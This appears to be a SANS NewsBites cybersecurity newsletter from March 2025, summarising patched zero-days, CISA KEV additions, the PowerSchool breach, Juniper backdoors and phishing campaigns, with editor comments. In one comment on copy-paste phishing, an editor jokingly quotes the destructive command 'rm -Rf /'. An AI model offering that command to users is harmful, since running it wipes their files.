SEC595: Applied Data Science and AI/Machine Learning for Cybersecurity Professionals

Experience SANS training through course previews.
Learn MoreLet us help.
Contact usBecome a member for instant access to our free resources.
Sign UpWe're here to help.
Contact UsApple has patched a zero-day vulnerability in the Webkit browser engine after receiving a report of its exploitation in "an extremely sophisticated attack against targeted individuals." CVE-2025-24201, still awaiting CVSS assessment, would allow an attacker to break out of the Web Content sandbox using maliciously crafted web content, due to an out-of-bounds write issue in versions of iOS before iOS 17.2. Apple notes the update "is a supplementary fix for an attack that was blocked in iOS 17.2," fixed in iOS and iPadOS 18.3.2, with improved checks to prevent unauthorized actions. Devices impacted are "iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later." Dan Goodin at Ars Technica posits that "users facing the biggest threat are likely those who are targets of well-funded law enforcement agencies or nation-state spies."
If you have Apple Intelligence disabled: Double-check after applying the patch to ensure that it is still disabled.
Apple fixes to iOS are fairly timely and non-disruptive. Most Apple users should enable automatic updates Development tools may deserve a little more scrutiny.
You almost forget that safari has such a significant dominance in the market, but it does. Patching your device would be the obvious thing, but it's common for users not to fix their iPhones.
The same flaw is addressed in Safari 18.3.1, MacOS 15.3.2, and visionOS 2.3.2. Note watchOS gets a pass this time. Apple says this is being exploited actively.
Tuesday, March 11, saw security updates from Microsoft, Adobe, and Apple. Microsoft released updates to address more than 50 vulnerabilities, including six that are already being actively exploited; all six are rated important. Six other vulnerabilities are deemed critical. Adobe released updates to address 35 security issues in a range of their products, including nine issues affecting Reader and Acrobat.
While there are only 51 flaws addressed this cycle, at least five are in the NIST KEV. Make plans to get them deployed by the end of March to meet the KEV timetable. Even so, with updates from Microsoft, Apple, Ivanti and Juniper, don't overlook the Adobe Acrobat/Acrobat Reader update. This affects both the DC and older classic versions. Take a look at updating those classic versions to DC for consistency and ongoing support.
(This is me, not complaining about software quality and not pointing out once again that patching is an inefficient way to achieve it. The cost of both risk and that of routine patching is part of the cost of the software and may exceed the cost of the license.)
SANS ISC
Krebs on Security
The Register
SecurityWeek
SC World
Adobe
The US Cybersecurity and Infrastructure Security Agency (CISA) has added five vulnerabilities to the Known Exploited Vulnerabilities (KEV) catalog: three critical flaws affecting Ivanti Endpoint Manager (EPM), and two high-severity flaws affecting Advantive VeraCore. CVE-2024-13159, CVE-2024-13160, and CVE-2024-13161, all assigned CVSS score 9.8 by Ivanti and patched in January 2025, allow an attacker to leak sensitive information via absolute path traversal in Ivanti EPM before the 2024 January-2025 Security Update and 2022 SU6 January-2025 Security Update. No details of known exploits have been publicly provided. CVE-2024-57968, CVSS score 8.8, allows a remote authenticated user "to upload files to unintended folders (e.g., ones that are accessible during web browsing by other users)," due to an unrestricted file upload vulnerability in Advantive VeraCore before 2024.4.2.1. CVE-2025-25181, CVSS score 7.5, allows a remote user to execute arbitrary SQL commands via the PMSess1 parameter due to an SQL injection vulnerability in timeoutWarning.asp in Advantive VeraCore through 2025.1.0. The Hacker News reports that "the exploitation of VeraCore vulnerabilities has been attributed to likely a Vietnamese threat actor named XE Group." Federal Civilian Executive Branch (FCEB) agencies must apply patches for all five flaws by March 31, 2025.
The three Ivanti vulnerabilities were widely reported in January and a patch made available. If one were to apply a standard of care, the patch should have been applied by now by all affected organizations, regardless of adding them to the KEV.
It should come as no surprise the Apple WebKit flaw and Juniper OS flaw were also added to the KEV. These are all, (Apple, Juniper, Ivanti, Microsoft and VeraCore) due between March 31st and April 3rd.
CISA
Ivanti
The Hacker News
SecurityWeek
Bleeping Computer
On March 13, 2025, three UK civil liberties organizations -- the Open Rights Group (ORG), Big Brother Watch, and Index on Censorship -- published a joint open letter to Lord Justice Singh, president of the UK's Investigatory Powers Tribunal (IPT), which on Friday, March 14, 2025 will hold a closed-door hearing of Apple's appeal of an Technical Capability Notice (TCN) to create a backdoor in the company's Advanced Data Protection for the UK government. The organizations mention their involvement in similar cases involving the IPT and TCNs, and urge disclosure of the government's basis for "compel[ling] a private company to undermine the privacy and security of its customers," noting the impossibility of targeted breaks in end-to-end encryption (E2EE). The letter cites a European Court of Human Rights (ECtHR) ruling stating that the harm of obliging E2EE decryption threatens to unacceptably weaken encryption to an extent "not proportionate to the legitimate aims pursued." Finally, the letter argues the IPT's secrecy is unjustified by its obligations and legal precedents, stating that "the public interest lies in conducting this hearing in public."
In this case, the law has been written in such a way as to resist public scrutiny. That in itself is problematic.
Continue to keep an eye on this with consideration to any precedent it may set. This latest move, beyond restating the concerns over weakened security, calls for public view of the request and hearing. Transparency is important when it comes to making a case that the government's needs are better served through impacting a private company's security protections.
It's time to see whether the UK Government blinks and rescinds the TCN. I suspect not, given the capability requirement is enshrined in law. If that turns out to be the case, expect other countries to follow with similar laws. As a reminder, there is currently a bill in committee in Sweden's Riksdag, mandating backdoor access to both Signal and WhatsApp applications.
A Mozilla root certificate is set to expire on Friday, March 14, 2025, which will cut off the functionality and security of Firefox add-ons, signed content, and DRM-protected media playback unless users update to Firefox version 128 (ESR 115.13) or later. According to Mozilla, using Firefox with an expired root certificate puts users at risk from malicious add-ons and revoked or fraudulent security certificates due to out-of-date blocklists and revocation lists, as well as from unavailability of alerts about compromised credentials. Windows, macOS, Linux, and Android users using Firefox or Firefox-based browsers must apply the update, but iOS users do not need to take any action.
Every year or so we have an item about customer facing certs expiring and impacting business. Use this one stay ahead of that - do you now where all your certs are??
Firefox 128 (and ESR 115.13) were released July 9th, and Firefox 136/ESR 128.8.0 were released March 4th, you should be well past the minimum required versions at this point. Even so, it's a good time to scan for laggers and move them up.
After everyone went wild with Certificates, this is *yet another* system where root certificates need to be refreshed and will require an update. Could you update Firefox if you are still using it?
It is always a good security practice to update to the latest software version as it becomes available. Firefox version 128 was released almost a year ago. Firefox updates automatically by default, even when the browser is not running. That said, its best to check as there is a 'disableappupdate' configuration setting available to users.
Mozilla
The Register
The Hacker News
Bleeping Computer
PowerSchool has released a February 2025 report by CrowdStrike describing their month-and-a-half-long investigation of the December 2024 data breach of PowerSchool's Student Information System (SIS). CrowdStrike confirmed that the threat actor gained access to the PowerSource portal using a single compromised set of support credentials, using "Maintenance Remote Support operations" to access schools' SIS instances. The threat actor maintained unauthorized access between December 19 and December 28, 2024, and exfiltrated data from "Teachers" and "Students" tables in SIS. System-layer access, malware, and lateral movement to environments outside of PowerSource and SIS were not detected, nor did CrowdStrike observe exfiltrated data for sale on the dark web. The same compromised credentials were used to access the PowerSource portal between August 16 and September 17, 2024, but CrowdStrike cannot confirm this was done by the same threat actor, and "log data did not go back far enough to show whether the August and September activity included unauthorized access to PowerSchool SIS data." The report notes that apart from employing CrowdStrike tools, PowerSchool has deactivated the compromised credential; reset employee and contractor passwords; and secured and limited access to the PowerSource portal, mandating access through a VPN requiring single sign-on and multi-factor authentication.
If your organisation has Internet facing portals then this report is a must read. Learn from this report and ensure the remediation steps, and lessons learnt from this breach, are applied to your organisation.
A 'compromised credential' enabled the compromise, apparently remote access with reusable passwords was allowed. This should be a go/no-go question for outsourcing decisions, including 'Anything as a Service' offerings. Explicitly require a statement from all vendors that phishing-resistant MFA is use by all privileged accounts - service providers are high-leverage and constantly targeted.
I'm glad to see this level of detail publicly available. It appears from reading the scant report that the system's administrative interfaces were fully available over the Internet. While a VPN with MFA is a best practice, it's also unclear if they are highlighting the fact that it's a best practice or if they lack a VPN with MFA. Either way, it's a simple read, and I recommend just walking through it.
It is both common and risky in IT to put controls intended for the exclusive use of management right next to those provided for unprivileged users. Smart people do not do that.
PowerSchool
PowerSchool
Bleeping Computer
Juniper Networks has released a bulletin noting updates and mitigations for a vulnerability in Junos OS MX routers that have reached end-of-life (EOL), following Mandiant's discovery of six custom variations of TINYSHELL backdoor malware operating on EOL Junos OS routers. CVE-2025-21590 allows a local attacker with shell access to inject arbitrary code and compromise the device due to an improper isolation or compartmentalization vulnerability in the Junos OS kernel. MandiantÕs report shows how a threat actor tracked as UNC3886 exploited this vulnerability to circumvent the Verified Exec (veriexec) subsystem protecting the OS against unauthorized code and deploy the backdoors. Each of the six backdoors pairs TINYSHELL functionality with a different set of malicious capabilities and activation methods. Mandiant provides Indicators of Compromise (IOCs) and YARA Rules, and recommends organizations update Juniper devices and run the Juniper Malware Removal Tool (JMRT); implement secure authentication; strictly manage network configuration; monitor activity closely; prioritize patching; focus on device lifecycle management; harden security; and "proactively leverage threat intelligence."
Juniper
The Register
Bleeping Computer
The Hacker News
Researchers from Kaspersky's Global Research and Analysis Team (GReAT) have noted recent activity attributed to the advanced persistent threat (APT) group dubbed Sidewinder, notably focusing on maritime targets, logistics targets, and the nuclear sector, in spear phishing email campaigns primarily across Africa and South Asia. The targeted lure email contains a DOCX attachment that "uses the remote template injection technique to download an RTF file stored on a remote server controlled by the attacker," then exploiting a known Microsoft Office flaw to install a "Backdoor Loader" which in turn loads Sidewinder's custom "post-exploitation toolkit." CVE-2017-11882, patched since 2017, is a memory corruption vulnerability affecting older versions of Microsoft Office, allowing an attacker to run arbitrary code when objects are not properly handled in memory. Kaspersky urges regular software updates and anti-phishing employee training.
Beyond putting phishing awareness campaigns in place, make sure you're not neglecting package updates; this campaign is leveraging a flaw from 2017. Check for users holding onto down-rev versions which may have flaws not easily mitigated. Verify if the issues are real or perceived.
Researchers from Microsoft Threat Intelligence have "identified a phishing campaign that impersonates online travel agency Booking.com and targets organizations in the hospitality industry" to steal information that can be used to commit financial fraud. In a report published this week, Microsoft Threat Intelligence describes the campaign, which involves fraudulent emails that attempt to manipulate people and organizations in the hospitality industry into performing actions that result in malware being executed. Microsoft writes that "as of February 2025, this campaign is ongoing." The report includes recommendations and detection details.
Good reminder to make sure your awareness/education program explicitly says 'no legitimate email will ever ask you to copy, paste, and launch commands.'
Email is still a vector, as many email systems make you click links. This one leverages bookings.com, but we have seen this with other systems. The vector here is novel, and you are asked to copy/paste it into a terminal. You end up attacking yourself. The people on IRC can help. They keep telling me to type rm -Rf / into my terminal, but my computer reboots.
Note to self: Hospitality industry is not Healthcare industry. The actors are targeting the sector with fake booking.com reports of bad reviews including links to entice positive reviews. As reliant as their services are on positive feedback, these should be considered highly targeted and essentially impossible to resist. Guidance and inline (EDR/Boundary protections) are going to play heavily in heading off this attack.
A case study from Dragos describes how they helped the Littleton (Massachusetts) Electric Light and Water Departments (LELWD) remove Volt Typhoon's presence from their network. In November 2023, the US Federal Bureau of Investigation notified LELWD of intruders in their network. LELWD then brought in Dragos, who determined that the China-based threat actors had had a presence in LELWDÕs network since February 2023. Dragos writes, "the significance of the discovery of this attack is that it highlights that the adversary not only aimed to maintain persistent access to the victim's environment for a long tenure, but also were aiming to exfiltrate specific data related to OT operating procedures and spatial layout data relating to energy grid operations."
The Dragos document is more of a customer testimonial than an incident report Ð no info on how the attackers gained initial access and there seem to have been no public statements from LELWD since no citizen data was exposed. Another key point: apparently a grant from the American Public Power Association enabled Littleton to get to the point where the compromise was detected with Dragos tools. 22% of APPAÕs funding has come from federal government agencies and may be at risk under the current government cutting actions. APPA has done very good work in the past.
Detected activity like this by Volt Typhoon has kicked off an initiative by the US AND other governments to harden critical infrastructure. The best defense against this sort of attack, beyond keeping entry points patched and hardened, is to monitor for unusual behavior, particularly lateral movement. Volt Typhoon leverages existing tools (LOTL) rather than installing new malware you could detect.
If the attacker's objective, plan, and tools include persistence and he is not discovered for weeks to months, successfully "removing" will be costly, and success difficult to know.
Dragos
The Record
The Register
DarkReading
SecurityWeek
SANS Internet StormCast Friday, March 14, 2025
File Hashes in MSFT BI; Apache Camel Vuln; Juniper Fixes Exploited Vuln; AMI Patches 10.0 Redfish BMC Vuln
https://isc.sans.edu/podcastdetail/9364
File Hashes Analysis with Power BI
Guy explains in this diary how to analyze Cowrie honeypot file hashes using Microsoft's BI tool and what you may be able to discover using this tool.
https://isc.sans.edu/diary/File+Hashes+Analysis+with+Power+BI+from+Data+Stored+in+DShield+SIEM/31764
Apache Camel Vulnerability
Apache released two patches for Camel in close succession. Initially, the vulnerability was only addressed for headers, but as Akamai discovered, it can also be exploited via query parameters. This vulnerability is trivial to exploit and leads to arbitrary code execution.
Juniper Patches Junos Vulnerability
Juniper patches an already exploited vulnerability in JunOS. However, to exploit the vulnerability, and attacker already needs privileged access. By exploiting the vulnerability, an attacker may completely compromised the device.
AMI Security Advisory
AMI patched three vulnerabilities. One of the, an authentication bypass in Redfish, allows for a complete system compromise without authentication and is rated with a CVSS score of 10.0.
https://go.ami.com/hubfs/Security%20Advisories/2025/AMI-SA-2025003.pdf
SANS Internet StormCast Thursday, March 13, 2025
Exploiting Login Pages with Log4j; Patch Tuesday Fallout; Adobe Patches; Medusa Ransomware; Zoom and Font Library Updates
https://isc.sans.edu/podcastdetail/9362
Log4J Scans for VMWare Hybrid Cloud Extensions
An attacker is scanning various login pages, including the authentication feature in the VMWare HCX REST API for Log4j vulnerabilities. The attack submits the exploit string as username, hoping to trigger the vulnerability as Log4j logs the username
Patch Tuesday Fallout
Yesterday's Apple patch may re-activate Apple Intelligence for users who earlier disabled it. Microsoft is offering support for users whose USB printers started printing gibberish after a January patch was applied.
https://www.macrumors.com/2025/03/11/ios-18-3-2-apple-intelligence-auto-on/
Adobe Updates
Adobe updated seven different products, including Adobe Acrobat. The Acrobat vulnerability may lead to remote code execution and Adobe considers the vulnerabilities critical.
https://helpx.adobe.com/security/security-bulletin.html
Medusa Ransomware
CISA and partner agencies released details about the Medusa Ransomware. The document includes many details useful to defenders.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a
Zoom Update
Zoom released a critical update fixing a number of remote code execution vulnerabilities.
https://www.zoom.com/en/trust/security-bulletin/
FreeType Library Vulnerability
https://www.facebook.com/security/advisories/cve-2025-27363
SANS Internet StormCast Wednesday, March 12, 2025
Microsoft Patch Tuesday; Apple Patch; Espressif ESP32 Statement
https://isc.sans.edu/podcastdetail/9360
Microsoft Patch Tuesday
Microsoft Patched six already exploited vulnerabilities today. In addition, the patches included a critical patch for Microsoft's DNS server and about 50 additional patches.
https://isc.sans.edu/diary/Microsoft+Patch+Tuesday+March+2025/31756
Apple Updates iOS/macOS
Apple released an update to address a single, already exploited, vulnerability in WebKit. This vulnerability affects iOS, macOS and VisionOS.
https://support.apple.com/en-us/100100
Expressif Response to ESP32 Debug Commands
Expressif released a statement commenting on the recent release of a paper alleging "Backdoors" in ESP32 chipsets. According to Expressif, these commands are debug commands and not reachable directly via Bluetooth.
Catch up on recent editions of NewsBites or browse our full archive of expert-curated cybersecurity news.
Browse ArchiveAWS Cloud Visibility Best Practices: You can't secure what you can't see.
Survey: 2025 SANS SOC Survey - Facing Top Challenges in Security Operations | The SANS 2025 SOC Survey uncovers the biggest challenges, trends, and innovations shaping modern SOCs.
Webcast: ICS Security and Management of Change: Risks and Resilience | April 16, 10:30 ET | Join us for an in-depth webcast exploring the intersection of ICS security and management of change (MoC).
Survey: 2025 SANS Multicloud Survey Ð Securing Multiple Clouds at Scale The SANS 2025 Multi-Cloud Survey uncovers key trends, challenges, and best practices in securing multi-cloud environments.